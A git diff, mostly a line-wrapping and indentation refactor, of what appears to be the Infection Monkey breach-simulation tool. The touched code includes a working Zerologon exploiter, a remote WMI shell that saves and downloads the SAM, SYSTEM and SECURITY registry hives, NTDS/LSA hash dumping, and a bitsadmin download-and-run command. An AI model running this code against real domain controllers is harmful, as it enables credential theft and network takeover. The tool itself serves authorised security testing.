+ security=os.path.join(os.path.expanduser("~"), "monkey-security.save"),
)
dumped_secrets = self.get_dumped_secrets(remote_name="LOCAL", options=options)
@@ -310,7 +315,8 @@ class ZerologonExploiter(HostExploiter):
except Exception as e:
LOG.info(
- f"Exception occurred while dumping secrets to get original DC password's NT hash: {str(e)}"
+ f"Exception occurred while dumping secrets to get original DC password's NT "
+ f"hash: {str(e)}"
)
finally:
@@ -318,14 +324,15 @@ class ZerologonExploiter(HostExploiter):
def save_HKLM_keys_locally(self, username: str, user_pwd_hashes: List[str]) -> bool:
LOG.info(
- f"Starting remote shell on victim with credentials:\n"
- f"user: {username}\n"
- f"hashes (SHA-512): {self._config.hash_sensitive_data(user_pwd_hashes[0])} : "
- f"{self._config.hash_sensitive_data(user_pwd_hashes[1])}"
+ f"Starting remote shell on victim with credentials:\n"
+ f"user: {username}\n"
+ f"hashes (SHA-512): {self._config.hash_sensitive_data(user_pwd_hashes[0])} : "
+ f"{self._config.hash_sensitive_data(user_pwd_hashes[1])}"
)
wmiexec = Wmiexec(
- ip=self.dc_ip, username=username, hashes=":".join(user_pwd_hashes), domain=self.dc_ip
+ ip=self.dc_ip, username=username, hashes=":".join(user_pwd_hashes),
+ domain=self.dc_ip
)
remote_shell = wmiexec.get_remote_shell()
@@ -334,12 +341,13 @@ class ZerologonExploiter(HostExploiter):
try:
# Save HKLM keys on victim.
remote_shell.onecmd(
- "reg save HKLM\\SYSTEM system.save && "
- + "reg save HKLM\\SAM sam.save && "
- + "reg save HKLM\\SECURITY security.save"
+ "reg save HKLM\\SYSTEM system.save && "
+ + "reg save HKLM\\SAM sam.save && "
+ + "reg save HKLM\\SECURITY security.save"
)
- # Get HKLM keys locally (can't run these together because it needs to call do_get()).
+ # Get HKLM keys locally (can't run these together because it needs to call
+ # do_get()).
remote_shell.onecmd("get system.save")
remote_shell.onecmd("get sam.save")
remote_shell.onecmd("get security.save")
@@ -382,7 +390,7 @@ class ZerologonExploiter(HostExploiter):
return False
def try_restoration_attempt(
- self, rpc_con: rpcrt.DCERPC_v5, original_pwd_nthash: str
+ self, rpc_con: rpcrt.DCERPC_v5, original_pwd_nthash: str
) -> Optional[object]:
try:
restoration_attempt_result = self.attempt_restoration(rpc_con, original_pwd_nthash)
@@ -398,7 +406,7 @@ class ZerologonExploiter(HostExploiter):
return False
def attempt_restoration(
- self, rpc_con: rpcrt.DCERPC_v5, original_pwd_nthash: str
+ self, rpc_con: rpcrt.DCERPC_v5, original_pwd_nthash: str
) -> Optional[object]:
plaintext = b"\x00" * 8
ciphertext = b"\x00" * 8
@@ -406,26 +414,26 @@ class ZerologonExploiter(HostExploiter):
# Send challenge and authentication request.
server_challenge_response = nrpc.hNetrServerReqChallenge(
- rpc_con, self.dc_handle + "\x00", self.dc_name + "\x00", plaintext
+ rpc_con, self.dc_handle + "\x00", self.dc_name + "\x00", plaintext
)
server_challenge = server_challenge_response["ServerChallenge"]
server_auth = nrpc.hNetrServerAuthenticate3(
- rpc_con,
- self.dc_handle + "\x00",
- self.dc_name + "$\x00",
- nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
- self.dc_name + "\x00",
- ciphertext,
- flags,
+ rpc_con,
+ self.dc_handle + "\x00",
+ self.dc_name + "$\x00",
+ nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
+ self.dc_name + "\x00",
+ ciphertext,
+ flags,
)
assert server_auth["ErrorCode"] == 0
session_key = nrpc.ComputeSessionKeyAES(
- None,
- b"\x00" * 8,
- server_challenge,
- unhexlify("31d6cfe0d16ae931b73c59d7e0c089c0"),
+ None,
+ b"\x00" * 8,
+ server_challenge,
+ unhexlify("31d6cfe0d16ae931b73c59d7e0c089c0"),
)
try:
@@ -436,7 +444,7 @@ class ZerologonExploiter(HostExploiter):
ZerologonExploiter._set_up_request(request, self.dc_name)
request["PrimaryName"] = NULL
pwd_data = impacket.crypto.SamEncryptNTLMHash(
- unhexlify(original_pwd_nthash), session_key
+ unhexlify(original_pwd_nthash), session_key
)
request["UasNewPassword"] = pwd_data
diff --git a/monkey/infection_monkey/exploit/zerologon_utils/dump_secrets.py b/monkey/infection_monkey/exploit/zerologon_utils/dump_secrets.py
index 9d2116d07..6601a5ea4 100644
--- a/monkey/infection_monkey/exploit/zerologon_utils/dump_secrets.py
+++ b/monkey/infection_monkey/exploit/zerologon_utils/dump_secrets.py
@@ -98,11 +98,11 @@ class DumpSecrets:
def connect(self):
self.__smb_connection = SMBConnection(self.__remote_name, self.__remote_host)
self.__smb_connection.login(
- self.__username,
- self.__password,
- self.__domain,
- self.__lmhash,
- self.__nthash,
+ self.__username,
+ self.__password,
+ self.__domain,
+ self.__lmhash,
+ self.__nthash,
)
def dump(self): # noqa: C901
@@ -132,24 +132,26 @@ class DumpSecrets:
self.connect()
except Exception as e:
if os.getenv("KRB5CCNAME") is not None and self.__do_kerberos is True:
- # SMBConnection failed. That might be because there was no way to log into the
- # target system. We just have a last resort. Hope we have tickets cached and that they
+ # SMBConnection failed. That might be because there was no way to
+ # log into the
+ # target system. We just have a last resort. Hope we have tickets
+ # cached and that they
# will work
LOG.debug(
- "SMBConnection didn't work, hoping Kerberos will help (%s)"
- % str(e)
+ "SMBConnection didn't work, hoping Kerberos will help (%s)"
+ % str(e)
)
else:
raise
self.__remote_ops = RemoteOperations(
- self.__smb_connection, self.__do_kerberos, self.__kdc_host
+ self.__smb_connection, self.__do_kerberos, self.__kdc_host
)
self.__remote_ops.setExecMethod(self.__options.exec_method)
if (
- self.__just_DC is False
- and self.__just_DC_NTLM is False
- or self.__use_VSS_method is True
+ self.__just_DC is False
+ and self.__just_DC_NTLM is False
+ or self.__use_VSS_method is True
):
self.__remote_ops.enableRegistry()
bootkey = self.__remote_ops.getBootKey()
@@ -158,24 +160,26 @@ class DumpSecrets:
except Exception as e:
self.__can_process_SAM_LSA = False
if (
- str(e).find("STATUS_USER_SESSION_DELETED")
- and os.getenv("KRB5CCNAME") is not None
- and self.__do_kerberos is True
+ str(e).find("STATUS_USER_SESSION_DELETED")
+ and os.getenv("KRB5CCNAME") is not None
+ and self.__do_kerberos is True
):
- # Giving some hints here when SPN target name validation is set to something different to Off.
- # This will prevent establishing SMB connections using TGS for SPNs different to cifs/.
+ # Giving some hints here when SPN target name validation is set to
+ # something different to Off.
+ # This will prevent establishing SMB connections using TGS for SPNs
+ # different to cifs/.
LOG.error(
- "Policy SPN target name validation might be restricting full DRSUAPI dump."
- + "Try -just-dc-user"
+ "Policy SPN target name validation might be restricting full "
+ "DRSUAPI dump." + "Try -just-dc-user"
)
else:
LOG.error("RemoteOperations failed: %s" % str(e))
# If RemoteOperations succeeded, then we can extract SAM and LSA.
if (
- self.__just_DC is False
- and self.__just_DC_NTLM is False
- and self.__can_process_SAM_LSA
+ self.__just_DC is False
+ and self.__just_DC_NTLM is False
+ and self.__can_process_SAM_LSA
):
try:
if self.__is_remote is True:
@@ -184,7 +188,7 @@ class DumpSecrets:
SAM_file_name = self.__sam_hive
self.__SAM_hashes = SAMHashes(
- SAM_file_name, bootkey, isRemote=self.__is_remote
+ SAM_file_name, bootkey, isRemote=self.__is_remote
)
self.__SAM_hashes.dump()
except Exception as e:
@@ -197,10 +201,10 @@ class DumpSecrets:
SECURITY_file_name = self.__security_hive
self.__LSA_secrets = LSASecrets(
- SECURITY_file_name,
- bootkey,
- self.__remote_ops,
- isRemote=self.__is_remote,
+ SECURITY_file_name,
+ bootkey,
+ self.__remote_ops,
+ isRemote=self.__is_remote,
)
self.__LSA_secrets.dumpCachedHashes()
self.__LSA_secrets.dumpSecrets()
@@ -208,7 +212,8 @@ class DumpSecrets:
LOG.debug(traceback.print_exc())
LOG.error("LSA hashes extraction failed: %s" % str(e))
- # NTDS Extraction we can try regardless of RemoteOperations failing. It might still work.
+ # NTDS Extraction we can try regardless of RemoteOperations failing. It might
+ # still work.
if self.__is_remote is True:
if self.__use_VSS_method and self.__remote_ops is not None:
NTDS_file_name = self.__remote_ops.saveNTDS()
@@ -218,20 +223,21 @@ class DumpSecrets:
NTDS_file_name = self.__ntds_file
self.__NTDS_hashes = NTDSHashes(
- NTDS_file_name,
- bootkey,
- isRemote=self.__is_remote,
- noLMHash=self.__no_lmhash,
- remoteOps=self.__remote_ops,
- useVSSMethod=self.__use_VSS_method,
- justNTLM=self.__just_DC_NTLM,
+ NTDS_file_name,
+ bootkey,
+ isRemote=self.__is_remote,
+ noLMHash=self.__no_lmhash,
+ remoteOps=self.__remote_ops,
+ useVSSMethod=self.__use_VSS_method,
+ justNTLM=self.__just_DC_NTLM,
)
try:
self.__NTDS_hashes.dump()
except Exception as e:
LOG.debug(traceback.print_exc())
if str(e).find("ERROR_DS_DRA_BAD_DN") >= 0:
- # We don't store the resume file if this error happened, since this error is related to lack
+ # We don't store the resume file if this error happened, since this error
+ # is related to lack
# of enough privileges to access DRSUAPI.
resume_file = self.__NTDS_hashes.getResumeSessionFile()
if resume_file is not None:
@@ -239,7 +245,8 @@ class DumpSecrets:
LOG.error(e)
if self.__use_VSS_method is False:
LOG.error(
- "Something wen't wrong with the DRSUAPI approach. Try again with -use-vss parameter"
+ "Something wen't wrong with the DRSUAPI approach. Try again with "
+ "-use-vss parameter"
)
self.cleanup()
except (Exception, KeyboardInterrupt) as e:
diff --git a/monkey/infection_monkey/exploit/zerologon_utils/options.py b/monkey/infection_monkey/exploit/zerologon_utils/options.py
index 32cdfe40f..0c888a459 100644
--- a/monkey/infection_monkey/exploit/zerologon_utils/options.py
+++ b/monkey/infection_monkey/exploit/zerologon_utils/options.py
@@ -26,18 +26,20 @@ class OptionsForSecretsdump:
use_vss = False
def __init__(
- self,
- dc_ip=None,
- just_dc=True,
- sam=None,
- security=None,
- system=None,
- target=None,
- target_ip=None,
+ self,
+ dc_ip=None,
+ just_dc=True,
+ sam=None,
+ security=None,
+ system=None,
+ target=None,
+ target_ip=None,
):
- # dc_ip is assigned in get_original_pwd_nthash() and get_admin_pwd_hashes() in ../zerologon.py
+ # dc_ip is assigned in get_original_pwd_nthash() and get_admin_pwd_hashes() in
+ # ../zerologon.py
self.dc_ip = dc_ip
- # just_dc becomes False, and sam, security, and system are assigned in get_original_pwd_nthash() in ../zerologon.py
+ # just_dc becomes False, and sam, security, and system are assigned in
+ # get_original_pwd_nthash() in ../zerologon.py
self.just_dc = just_dc
self.sam = sam
self.security = security
diff --git a/monkey/infection_monkey/exploit/zerologon_utils/remote_shell.py b/monkey/infection_monkey/exploit/zerologon_utils/remote_shell.py
index 3b635f6b5..91511226f 100644
--- a/monkey/infection_monkey/exploit/zerologon_utils/remote_shell.py
+++ b/monkey/infection_monkey/exploit/zerologon_utils/remote_shell.py
@@ -134,9 +134,11 @@ class RemoteShell(cmd.Cmd):
self.__outputBuffer += data.decode(self.CODEC)
except UnicodeDecodeError:
LOG.error(
- "Decoding error detected, consider running chcp.com at the target,\nmap the result with "
- "https://docs.python.org/3/library/codecs.html#standard-encodings\nand then execute wmiexec.py "
- "again with -codec and the corresponding codec"
+ "Decoding error detected, consider running chcp.com at the target,"
+ "\nmap the result with "
+ "https://docs.python.org/3/library/codecs.html#standard-encodings\nand "
+ "then execute wmiexec.py "
+ "again with -codec and the corresponding codec"
)
self.__outputBuffer += data.decode(self.CODEC, errors="replace")
diff --git a/monkey/infection_monkey/exploit/zerologon_utils/vuln_assessment.py b/monkey/infection_monkey/exploit/zerologon_utils/vuln_assessment.py
index 467c41d69..0f345aa80 100644
--- a/monkey/infection_monkey/exploit/zerologon_utils/vuln_assessment.py
+++ b/monkey/infection_monkey/exploit/zerologon_utils/vuln_assessment.py
@@ -23,14 +23,14 @@ def _get_dc_name(dc_ip: str) -> str:
"""
nb = nmb.NetBIOS.NetBIOS()
name = nb.queryIPForName(
- ip=dc_ip, timeout=MEDIUM_REQUEST_TIMEOUT
+ ip=dc_ip, timeout=MEDIUM_REQUEST_TIMEOUT
) # returns either a list of NetBIOS names or None
if name:
return name[0]
else:
raise DomainControllerNameFetchError(
- "Couldn't get domain controller's name, maybe it's on external network?"
+ "Couldn't get domain controller's name, maybe it's on external network?"
)
@@ -62,21 +62,21 @@ def _try_zero_authenticate(zerologon_exploiter_object, rpc_con: rpcrt.DCERPC_v5)
# Send challenge and authentication request.
nrpc.hNetrServerReqChallenge(
- rpc_con,
- zerologon_exploiter_object.dc_handle + "\x00",
- zerologon_exploiter_object.dc_name + "\x00",
- plaintext,
+ rpc_con,
+ zerologon_exploiter_object.dc_handle + "\x00",
+ zerologon_exploiter_object.dc_name + "\x00",
+ plaintext,
)
try:
server_auth = nrpc.hNetrServerAuthenticate3(
- rpc_con,
- zerologon_exploiter_object.dc_handle + "\x00",
- zerologon_exploiter_object.dc_name + "$\x00",
- nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
- zerologon_exploiter_object.dc_name + "\x00",
- ciphertext,
- flags,
+ rpc_con,
+ zerologon_exploiter_object.dc_handle + "\x00",
+ zerologon_exploiter_object.dc_name + "$\x00",
+ nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
+ zerologon_exploiter_object.dc_name + "\x00",
+ ciphertext,
+ flags,
)
assert server_auth["ErrorCode"] == 0
@@ -84,7 +84,7 @@ def _try_zero_authenticate(zerologon_exploiter_object, rpc_con: rpcrt.DCERPC_v5)
except nrpc.DCERPCSessionError as ex:
if (
- ex.get_error_code() == 0xC0000022
+ ex.get_error_code() == 0xC0000022
): # STATUS_ACCESS_DENIED error; if not this, probably some other issue.
pass
else:
diff --git a/monkey/infection_monkey/exploit/zerologon_utils/wmiexec.py b/monkey/infection_monkey/exploit/zerologon_utils/wmiexec.py
index 2486998e4..615994b1f 100644
--- a/monkey/infection_monkey/exploit/zerologon_utils/wmiexec.py
+++ b/monkey/infection_monkey/exploit/zerologon_utils/wmiexec.py
@@ -73,26 +73,26 @@ class Wmiexec:
def connect(self):
self.smbConnection = SMBConnection(self.__ip, self.__ip)
self.smbConnection.login(
- user=self.__username,
- password=self.__password,
- domain=self.__domain,
- lmhash=self.__lmhash,
- nthash=self.__nthash,
+ user=self.__username,
+ password=self.__password,
+ domain=self.__domain,
+ lmhash=self.__lmhash,
+ nthash=self.__nthash,
)
self.dcom = DCOMConnection(
- target=self.__ip,
- username=self.__username,
- password=self.__password,
- domain=self.__domain,
- lmhash=self.__lmhash,
- nthash=self.__nthash,
- oxidResolver=True,
+ target=self.__ip,
+ username=self.__username,
+ password=self.__password,
+ domain=self.__domain,
+ lmhash=self.__lmhash,
+ nthash=self.__nthash,
+ oxidResolver=True,
)
try:
iInterface = self.dcom.CoCreateInstanceEx(
- wmi.CLSID_WbemLevel1Login, wmi.IID_IWbemLevel1Login
+ wmi.CLSID_WbemLevel1Login, wmi.IID_IWbemLevel1Login
)
iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface)
self.iWbemServices = iWbemLevel1Login.NTLMLogin("//./root/cimv2", NULL, NULL)
@@ -107,7 +107,7 @@ class Wmiexec:
self.connect()
win32Process, _ = self.iWbemServices.GetObject("Win32_Process")
self.shell = RemoteShell(
- self.__share, win32Process, self.smbConnection, self.OUTPUT_FILENAME
+ self.__share, win32Process, self.smbConnection, self.OUTPUT_FILENAME
)
return self.shell
diff --git a/monkey/infection_monkey/main.py b/monkey/infection_monkey/main.py
index e0c0eef08..c72f5b242 100644
--- a/monkey/infection_monkey/main.py
+++ b/monkey/infection_monkey/main.py
@@ -22,23 +22,24 @@ __author__ = "itamar"
LOG = None
LOG_CONFIG = {
- "version": 1,
- "disable_existing_loggers": False,
- "formatters": {
- "standard": {
- "format": "%(asctime)s [%(process)d:%(thread)d:%(levelname)s] %(module)s.%(funcName)s.%(lineno)d: %(message)s"
+ "version":1,
+ "disable_existing_loggers":False,
+ "formatters":{
+ "standard":{
+ "format":"%(asctime)s [%(process)d:%(thread)d:%(levelname)s] %(module)s.%("
+ "funcName)s.%(lineno)d: %(message)s"
},
},
- "handlers": {
- "console": {"class": "logging.StreamHandler", "level": "DEBUG", "formatter": "standard"},
- "file": {
- "class": "logging.FileHandler",
- "level": "DEBUG",
- "formatter": "standard",
- "filename": None,
+ "handlers":{
+ "console":{"class":"logging.StreamHandler", "level":"DEBUG", "formatter":"standard"},
+ "file":{
+ "class":"logging.FileHandler",
+ "level":"DEBUG",
+ "formatter":"standard",
+ "filename":None,
},
},
- "root": {"level": "DEBUG", "handlers": ["console"]},
+ "root":{"level":"DEBUG", "handlers":["console"]},
}
@@ -71,13 +72,13 @@ def main():
print("Error loading config: %s, using default" % (e,))
else:
print(
- "Config file wasn't supplied and default path: %s wasn't found, using internal default"
- % (config_file,)
+ "Config file wasn't supplied and default path: %s wasn't found, using internal "
+ "default" % (config_file,)
)
print(
- "Loaded Configuration: %r"
- % WormConfiguration.hide_sensitive_info(WormConfiguration.as_dict())
+ "Loaded Configuration: %r"
+ % WormConfiguration.hide_sensitive_info(WormConfiguration.as_dict())
)
# Make sure we're not in a machine that has the kill file
@@ -104,7 +105,8 @@ def main():
if WormConfiguration.use_file_logging:
if os.path.exists(log_path):
- # If log exists but can't be removed it means other monkey is running. This usually happens on upgrade
+ # If log exists but can't be removed it means other monkey is running. This usually
+ # happens on upgrade
# from 32bit to 64bit monkey on Windows. In all cases this shouldn't be a problem.
try:
os.remove(log_path)
@@ -126,7 +128,8 @@ def main():
sys.excepthook = log_uncaught_exceptions
LOG.info(
- ">>>>>>>>>> Initializing monkey (%s): PID %s <<<<<<<<<<", monkey_cls.__name__, os.getpid()
+ ">>>>>>>>>> Initializing monkey (%s): PID %s <<<<<<<<<<", monkey_cls.__name__,
+ os.getpid()
)
LOG.info(f"version: {get_version()}")
@@ -141,12 +144,12 @@ def main():
with open(config_file, "w") as config_fo:
json_dict = WormConfiguration.as_dict()
json.dump(
- json_dict,
- config_fo,
- skipkeys=True,
- sort_keys=True,
- indent=4,
- separators=(",", ": "),
+ json_dict,
+ config_fo,
+ skipkeys=True,
+ sort_keys=True,
+ indent=4,
+ separators=(",", ": "),
)
return True
diff --git a/monkey/infection_monkey/model/__init__.py b/monkey/infection_monkey/model/__init__.py
index 4f6f8de4a..1bfee3ef2 100644
--- a/monkey/infection_monkey/model/__init__.py
+++ b/monkey/infection_monkey/model/__init__.py
@@ -27,12 +27,12 @@ MONKEY_CMDLINE_DETACHED_WINDOWS = "%s start cmd /c %%(monkey_path)s %s" % (
MONKEY_ARG,
)
MONKEY_CMDLINE_HTTP = (
- '%s /c "bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s'
- '&cmd /c %%(monkey_path)s %s"'
- % (
- CMD_PREFIX,
- MONKEY_ARG,
- )
+ '%s /c "bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s'
+ '&cmd /c %%(monkey_path)s %s"'
+ % (
+ CMD_PREFIX,
+ MONKEY_ARG,
+ )
)
DELAY_DELETE_CMD = (
"cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del /f /q %(file_path)s & "
diff --git a/monkey/infection_monkey/monkey.py b/monkey/infection_monkey/monkey.py
index 7123d8b9e..086a163a8 100644
--- a/monkey/infection_monkey/monkey.py
+++ b/monkey/infection_monkey/monkey.py
@@ -100,7 +100,8 @@ class InfectionMonkey(object):
WormConfiguration.command_servers.insert(0, self._default_server)
else:
LOG.debug(
- "Default server: %s is already in command servers list" % self._default_server
+ "Default server: %s is already in command servers list" %
+ self._default_server
)
def start(self):
@@ -161,8 +162,8 @@ class InfectionMonkey(object):
break
machines = self._network.get_victim_machines(
- max_find=WormConfiguration.victims_max_find,
- stop_callback=ControlClient.check_for_stop,
+ max_find=WormConfiguration.victims_max_find,
+ stop_callback=ControlClient.check_for_stop,
)
is_empty = True
for machine in machines:
@@ -172,17 +173,17 @@ class InfectionMonkey(object):
is_empty = False
for finger in self._fingerprint:
LOG.info(
- "Trying to get OS fingerprint from %r with module %s",
- machine,
- finger.__class__.__name__,
+ "Trying to get OS fingerprint from %r with module %s",
+ machine,
+ finger.__class__.__name__,
)
try:
finger.get_host_fingerprint(machine)
except BaseException as exc:
LOG.error(
- "Failed to run fingerprinter %s, exception %s"
- % finger.__class__.__name__,
- str(exc),
+ "Failed to run fingerprinter %s, exception %s"
+ % finger.__class__.__name__,
+ str(exc),
)
ScanTelem(machine).send()
@@ -203,23 +204,23 @@ class InfectionMonkey(object):
if self._default_server:
if self._network.on_island(self._default_server):
machine.set_default_server(
- get_interface_to_target(machine.ip_addr)
- + (
- ":" + self._default_server_port
- if self._default_server_port
- else ""
- )
+ get_interface_to_target(machine.ip_addr)
+ + (
+ ":" + self._default_server_port
+ if self._default_server_port
+ else ""
+ )
)
else:
machine.set_default_server(self._default_server)
LOG.debug(
- "Default server for machine: %r set to %s"
- % (machine, machine.default_server)
+ "Default server for machine: %r set to %s"
+ % (machine, machine.default_server)
)
# Order exploits according to their type
self._exploiters = sorted(
- self._exploiters, key=lambda exploiter_: exploiter_.EXPLOIT_TYPE.value
+ self._exploiters, key=lambda exploiter_:exploiter_.EXPLOIT_TYPE.value
)
host_exploited = False
for exploiter in [exploiter(machine) for exploiter in self._exploiters]:
@@ -227,7 +228,8 @@ class InfectionMonkey(object):
host_exploited = True
VictimHostTelem("T1210", ScanStatus.USED, machine=machine).send()
if exploiter.RUNS_AGENT_ON_SUCCESS:
- break # if adding machine to exploited, won't try other exploits on it
+ break # if adding machine to exploited, won't try other exploits
+ # on it
if not host_exploited:
self._fail_exploitation_machines.add(machine)
VictimHostTelem("T1210", ScanStatus.SCANNED, machine=machine).send()
@@ -244,12 +246,14 @@ class InfectionMonkey(object):
elif not WormConfiguration.alive:
LOG.info("Marked not alive from configuration")
- # if host was exploited, before continue to closing the tunnel ensure the exploited host had its chance to
+            # if host was exploited, before continuing to close the tunnel ensure the exploited
+ # host had its chance to
# connect to the tunnel
if len(self._exploited_machines) > 0:
time_to_sleep = WormConfiguration.keep_tunnel_open_time
LOG.info(
- "Sleeping %d seconds for exploited machines to connect to tunnel", time_to_sleep
+ "Sleeping %d seconds for exploited machines to connect to tunnel",
+ time_to_sleep
)
time.sleep(time_to_sleep)
@@ -261,7 +265,8 @@ class InfectionMonkey(object):
except PlannedShutdownException:
LOG.info(
- "A planned shutdown of the Monkey occurred. Logging the reason and finishing execution."
+ "A planned shutdown of the Monkey occurred. Logging the reason and finishing "
+ "execution."
)
LOG.exception("Planned shutdown, reason:")
@@ -306,7 +311,7 @@ class InfectionMonkey(object):
firewall.close()
else:
StateTelem(
- is_done=True, version=get_version()
+ is_done=True, version=get_version()
).send() # Signal the server (before closing the tunnel)
InfectionMonkey.close_tunnel()
firewall.close()
@@ -341,12 +346,12 @@ class InfectionMonkey(object):
startupinfo.dwFlags = CREATE_NEW_CONSOLE | STARTF_USESHOWWINDOW
startupinfo.wShowWindow = SW_HIDE
subprocess.Popen(
- DELAY_DELETE_CMD % {"file_path": sys.executable},
- stdin=None,
- stdout=None,
- stderr=None,
- close_fds=True,
- startupinfo=startupinfo,
+ DELAY_DELETE_CMD % {"file_path":sys.executable},
+ stdin=None,
+ stdout=None,
+ stderr=None,
+ close_fds=True,
+ startupinfo=startupinfo,
)
else:
os.remove(sys.executable)
@@ -376,10 +381,10 @@ class InfectionMonkey(object):
"""
if not exploiter.is_os_supported():
LOG.info(
- "Skipping exploiter %s host:%r, os %s is not supported",
- exploiter.__class__.__name__,
- machine,
- machine.os,
+ "Skipping exploiter %s host:%r, os %s is not supported",
+ exploiter.__class__.__name__,
+ machine,
+ machine.os,
)
return False
@@ -393,30 +398,31 @@ class InfectionMonkey(object):
return True
else:
LOG.info(
- "Failed exploiting %r with exploiter %s", machine, exploiter.__class__.__name__
+ "Failed exploiting %r with exploiter %s", machine,
+ exploiter.__class__.__name__
)
except ExploitingVulnerableMachineError as exc:
LOG.error(
- "Exception while attacking %s using %s: %s",
- machine,
- exploiter.__class__.__name__,
- exc,
+ "Exception while attacking %s using %s: %s",
+ machine,
+ exploiter.__class__.__name__,
+ exc,
)
self.successfully_exploited(machine, exploiter, exploiter.RUNS_AGENT_ON_SUCCESS)
return True
except FailedExploitationError as e:
LOG.info(
- "Failed exploiting %r with exploiter %s, %s",
- machine,
- exploiter.__class__.__name__,
- e,
+ "Failed exploiting %r with exploiter %s, %s",
+ machine,
+ exploiter.__class__.__name__,
+ e,
)
except Exception as exc:
LOG.exception(
- "Exception while attacking %s using %s: %s",
- machine,
- exploiter.__class__.__name__,
- exc,
+ "Exception while attacking %s using %s: %s",
+ machine,
+ exploiter.__class__.__name__,
+ exc,
)
finally:
exploiter.send_exploit_telemetry(result)
@@ -452,7 +458,8 @@ class InfectionMonkey(object):
"""
if not ControlClient.find_server(default_tunnel=self._default_tunnel):
raise PlannedShutdownException(
- "Monkey couldn't find server with {} default tunnel.".format(self._default_tunnel)
+ "Monkey couldn't find server with {} default tunnel.".format(
+ self._default_tunnel)
)
self._default_server = WormConfiguration.current_server
LOG.debug("default server set to: %s" % self._default_server)
diff --git a/monkey/infection_monkey/network/firewall.py b/monkey/infection_monkey/network/firewall.py
index cddba49fe..6b23734bb 100644
--- a/monkey/infection_monkey/network/firewall.py
+++ b/monkey/infection_monkey/network/firewall.py
@@ -5,12 +5,12 @@ import sys
def _run_netsh_cmd(command, args):
cmd = subprocess.Popen(
- "netsh %s %s"
- % (
- command,
- " ".join(['%s="%s"' % (key, value) for key, value in list(args.items()) if value]),
- ),
- stdout=subprocess.PIPE,
+ "netsh %s %s"
+ % (
+ command,
+ " ".join(['%s="%s"' % (key, value) for key, value in list(args.items()) if value]),
+ ),
+ stdout=subprocess.PIPE,
)
return cmd.stdout.read().strip().lower().endswith("ok.")
@@ -56,9 +56,9 @@ class WinAdvFirewall(FirewallApp):
return None
def add_firewall_rule(
- self, name="Firewall", direction="in", action="allow", program=sys.executable, **kwargs
+ self, name="Firewall", direction="in", action="allow", program=sys.executable, **kwargs
):
- netsh_args = {"name": name, "dir": direction, "action": action, "program": program}
+ netsh_args = {"name":name, "dir":direction, "action":action, "program":program}
netsh_args.update(kwargs)
try:
if _run_netsh_cmd("advfirewall firewall add rule", netsh_args):
@@ -70,7 +70,7 @@ class WinAdvFirewall(FirewallApp):
return None
def remove_firewall_rule(self, name="Firewall", **kwargs):
- netsh_args = {"name": name}
+ netsh_args = {"name":name}
netsh_args.update(kwargs)
try:
@@ -89,10 +89,10 @@ class WinAdvFirewall(FirewallApp):
for rule in list(self._rules.values()):
if (
- rule.get("program") == sys.executable
- and "in" == rule.get("dir")
- and "allow" == rule.get("action")
- and 4 == len(list(rule.keys()))
+ rule.get("program") == sys.executable
+ and "in" == rule.get("dir")
+ and "allow" == rule.get("action")
+ and 4 == len(list(rule.keys()))
):
return True
return False
@@ -125,14 +125,14 @@ class WinFirewall(FirewallApp):
return None
def add_firewall_rule(
- self,
- rule="allowedprogram",
- name="Firewall",
- mode="ENABLE",
- program=sys.executable,
- **kwargs,
+ self,
+ rule="allowedprogram",
+ name="Firewall",
+ mode="ENABLE",
+ program=sys.executable,
+ **kwargs,
):
- netsh_args = {"name": name, "mode": mode, "program": program}
+ netsh_args = {"name":name, "mode":mode, "program":program}
netsh_args.update(kwargs)
try:
@@ -146,14 +146,14 @@ class WinFirewall(FirewallApp):
return None
def remove_firewall_rule(
- self,
- rule="allowedprogram",
- name="Firewall",
- mode="ENABLE",
- program=sys.executable,
- **kwargs,
+ self,
+ rule="allowedprogram",
+ name="Firewall",
+ mode="ENABLE",
+ program=sys.executable,
+ **kwargs,
):
- netsh_args = {"program": program}
+ netsh_args = {"program":program}
netsh_args.update(kwargs)
try:
if _run_netsh_cmd("firewall delete %s" % rule, netsh_args):
diff --git a/monkey/infection_monkey/network/info.py b/monkey/infection_monkey/network/info.py
index 21adae9f8..a0db9ab02 100644
--- a/monkey/infection_monkey/network/info.py
+++ b/monkey/infection_monkey/network/info.py
@@ -52,6 +52,7 @@ if is_windows_os():
local_hostname = socket.gethostname()
return socket.gethostbyname_ex(local_hostname)[2]
+
def get_routes():
raise NotImplementedError()
@@ -59,10 +60,12 @@ if is_windows_os():
else:
from fcntl import ioctl
+
def local_ips():
valid_ips = [network["addr"] for network in get_host_subnets()]
return valid_ips
+
def get_routes(): # based on scapy implementation for route parsing
try:
f = open("/proc/net/route", "r")
@@ -88,7 +91,8 @@ else:
continue
try:
ifreq = ioctl(s, SIOCGIFADDR, struct.pack("16s16x", iff))
- except IOError: # interface is present in routing tables but does not have any assigned IP
+ except IOError: # interface is present in routing tables but does not have any
+ # assigned IP
ifaddr = "0.0.0.0"
else:
addrfamily = struct.unpack("h", ifreq[16:18])[0]
@@ -97,13 +101,13 @@ else:
else:
continue
routes.append(
- (
- socket.htonl(int(dst, 16)) & 0xFFFFFFFF,
- socket.htonl(int(msk, 16)) & 0xFFFFFFFF,
- socket.inet_ntoa(struct.pack("I", int(gw, 16))),
- iff,
- ifaddr,
- )
+ (
+ socket.htonl(int(dst, 16)) & 0xFFFFFFFF,
+ socket.htonl(int(msk, 16)) & 0xFFFFFFFF,
+ socket.inet_ntoa(struct.pack("I", int(gw, 16))),
+ iff,
+ ifaddr,
+ )
)
f.close()
diff --git a/monkey/infection_monkey/network/mssql_fingerprint.py b/monkey/infection_monkey/network/mssql_fingerprint.py
index 3113d278f..9ecdcbb5c 100644
--- a/monkey/infection_monkey/network/mssql_fingerprint.py
+++ b/monkey/infection_monkey/network/mssql_fingerprint.py
@@ -49,29 +49,28 @@ class MSSQLFinger(HostFinger):
data, server = sock.recvfrom(self.BUFFER_SIZE)
except socket.timeout:
LOG.info(
- "Socket timeout reached, maybe browser service on host: {0} doesnt exist".format(
- host
- )
+ "Socket timeout reached, maybe browser service on host: {0} doesnt "
+ "exist".format(host)
